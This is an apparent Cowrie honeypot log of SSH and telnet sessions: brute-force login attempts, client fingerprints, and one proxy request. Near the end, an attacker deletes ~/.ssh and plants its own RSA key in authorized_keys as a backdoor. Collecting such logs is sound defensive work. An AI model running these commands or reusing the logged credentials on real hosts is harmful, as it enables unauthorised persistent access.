{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:08:24.744486Z","src_ip":"134.199.174.250","session":"0f348a768d32"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"admin123","message":"login attempt [weblogic/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T14:08:25.789232Z","src_ip":"134.199.174.250","session":"0f348a768d32"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:08:27.129914Z","src_ip":"134.199.174.250","session":"0f348a768d32"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57345,"dst_ip":"1.2.3.4","dst_port":22,"session":"408190cd0b5d","protocol":"ssh","message":"New connection: 212.227.125.160:57345 (1.2.3.4:22) [session: 408190cd0b5d]","sensor":"my-vps","timestamp":"2025-09-08T14:08:50.976568Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:08:50.977894Z","src_ip":"212.227.125.160","session":"408190cd0b5d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57611,"dst_ip":"1.2.3.4","dst_port":22,"session":"1df09a3f4fdc","protocol":"ssh","message":"New connection: 212.227.125.160:57611 (1.2.3.4:22) [session: 1df09a3f4fdc]","sensor":"my-vps","timestamp":"2025-09-08T14:08:51.092289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:08:51.093177Z","src_ip":"212.227.125.160","session":"1df09a3f4fdc"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T14:08:51.208612Z","src_ip":"212.227.125.160","session":"1df09a3f4fdc"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:08:51.556598Z","src_ip":"212.227.125.160","session":"1df09a3f4fdc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T14:08:51.672904Z","session":"1df09a3f4fdc"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":47502,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ab3ba6122fd","protocol":"ssh","message":"New connection: 134.199.174.250:47502 (1.2.3.4:22) [session: 2ab3ba6122fd]","sensor":"my-vps","timestamp":"2025-09-08T14:08:54.532302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:08:54.540492Z","src_ip":"134.199.174.250","session":"2ab3ba6122fd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:08:54.914476Z","src_ip":"134.199.174.250","session":"2ab3ba6122fd"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"1234","message":"login attempt [weblogic/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T14:08:56.175839Z","src_ip":"134.199.174.250","session":"2ab3ba6122fd"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:08:57.508296Z","src_ip":"134.199.174.250","session":"2ab3ba6122fd"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":34846,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4aba7d2e1c3","protocol":"ssh","message":"New connection: 134.199.174.250:34846 (1.2.3.4:22) [session: a4aba7d2e1c3]","sensor":"my-vps","timestamp":"2025-09-08T14:09:25.594357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:09:25.595544Z","src_ip":"134.199.174.250","session":"a4aba7d2e1c3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:09:25.925452Z","src_ip":"134.199.174.250","session":"a4aba7d2e1c3"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"123","message":"login attempt [weblogic/123] failed","sensor":"my-vps","timestamp":"2025-09-08T14:09:27.048959Z","src_ip":"134.199.174.250","session":"a4aba7d2e1c3"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:09:28.380831Z","src_ip":"134.199.174.250","session":"a4aba7d2e1c3"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:10:01.094198Z","src_ip":"212.227.125.160","session":"1df09a3f4fdc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46082,"dst_ip":"1.2.3.4","dst_port":23,"session":"29a9edffbc49","protocol":"telnet","message":"New connection: 212.227.125.160:46082 (1.2.3.4:23) [session: 29a9edffbc49]","sensor":"my-vps","timestamp":"2025-09-08T14:10:01.155354Z"}
{"eventid":"cowrie.session.closed","duration":7.843946218490601,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:10:08.999192Z","src_ip":"212.227.125.160","session":"29a9edffbc49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39248,"dst_ip":"1.2.3.4","dst_port":23,"session":"4369f4ef26de","protocol":"telnet","message":"New connection: 212.227.235.229:39248 (1.2.3.4:23) [session: 4369f4ef26de]","sensor":"my-vps","timestamp":"2025-09-08T14:13:36.962423Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:13:37.167427Z","src_ip":"212.227.235.229","session":"4369f4ef26de"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:13:37.226516Z","src_ip":"212.227.235.229","session":"4369f4ef26de"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61584,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5da3e565142","protocol":"ssh","message":"New connection: 217.72.205.35:61584 (1.2.3.4:22) [session: f5da3e565142]","sensor":"my-vps","timestamp":"2025-09-08T14:15:02.053275Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:15:02.054929Z","src_ip":"217.72.205.35","session":"f5da3e565142"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:16:37.252236Z","src_ip":"212.227.235.229","session":"4369f4ef26de"}
{"eventid":"cowrie.session.closed","duration":180.2945101261139,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:16:37.256857Z","src_ip":"212.227.235.229","session":"4369f4ef26de"}
{"eventid":"cowrie.session.connect","src_ip":"65.49.1.24","src_port":9314,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ceec66278e7","protocol":"ssh","message":"New connection: 65.49.1.24:9314 (1.2.3.4:22) [session: 2ceec66278e7]","sensor":"my-vps","timestamp":"2025-09-08T14:20:56.946397Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-09-08T14:20:56.947794Z","src_ip":"65.49.1.24","session":"2ceec66278e7"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:20:56.948644Z","src_ip":"65.49.1.24","session":"2ceec66278e7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55036,"dst_ip":"1.2.3.4","dst_port":22,"session":"396fae9303d1","protocol":"ssh","message":"New connection: 217.72.205.35:55036 (1.2.3.4:22) [session: 396fae9303d1]","sensor":"my-vps","timestamp":"2025-09-08T14:21:38.866835Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:21:38.867902Z","src_ip":"217.72.205.35","session":"396fae9303d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38770,"dst_ip":"1.2.3.4","dst_port":22,"session":"1acc59a67f05","protocol":"ssh","message":"New connection: 212.227.235.229:38770 (1.2.3.4:22) [session: 1acc59a67f05]","sensor":"my-vps","timestamp":"2025-09-08T14:22:59.332987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:22:59.334070Z","src_ip":"212.227.235.229","session":"1acc59a67f05"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:22:59.455229Z","src_ip":"212.227.235.229","session":"1acc59a67f05"}
{"eventid":"cowrie.login.failed","username":"db2inst","password":"12345","message":"login attempt [db2inst/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T14:22:59.985906Z","src_ip":"212.227.235.229","session":"1acc59a67f05"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:23:01.111217Z","src_ip":"212.227.235.229","session":"1acc59a67f05"}
{"eventid":"cowrie.session.connect","src_ip":"106.52.40.62","src_port":52748,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4f852a3938e","protocol":"ssh","message":"New connection: 106.52.40.62:52748 (1.2.3.4:22) [session: b4f852a3938e]","sensor":"my-vps","timestamp":"2025-09-08T14:23:21.309608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:23:22.843888Z","src_ip":"106.52.40.62","session":"b4f852a3938e"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T14:23:22.844523Z","src_ip":"106.52.40.62","session":"b4f852a3938e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40464,"dst_ip":"1.2.3.4","dst_port":23,"session":"d719630aa7fc","protocol":"telnet","message":"New connection: 212.227.235.229:40464 (1.2.3.4:23) [session: d719630aa7fc]","sensor":"my-vps","timestamp":"2025-09-08T14:23:39.597328Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56724,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e09a5c66cc0","protocol":"ssh","message":"New connection: 212.227.235.229:56724 (1.2.3.4:22) [session: 7e09a5c66cc0]","sensor":"my-vps","timestamp":"2025-09-08T14:23:47.677987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:23:47.685294Z","src_ip":"212.227.235.229","session":"7e09a5c66cc0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:23:47.935540Z","src_ip":"212.227.235.229","session":"7e09a5c66cc0"}
{"eventid":"cowrie.login.success","username":"root","password":"AAAaaa111","message":"login attempt [root/AAAaaa111] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:23:48.929725Z","src_ip":"212.227.235.229","session":"7e09a5c66cc0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:23:49.446923Z","src_ip":"212.227.235.229","session":"7e09a5c66cc0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:23:49.447587Z","src_ip":"212.227.235.229","session":"7e09a5c66cc0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:23:49.448465Z","src_ip":"212.227.235.229","session":"7e09a5c66cc0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:23:49.678168Z","src_ip":"212.227.235.229","session":"7e09a5c66cc0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:23:50.230428Z","src_ip":"212.227.235.229","session":"7e09a5c66cc0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:23:50.231306Z","src_ip":"212.227.235.229","session":"7e09a5c66cc0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:23:50.429683Z","src_ip":"212.227.235.229","session":"7e09a5c66cc0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:23:50.431013Z","src_ip":"212.227.235.229","session":"7e09a5c66cc0"}
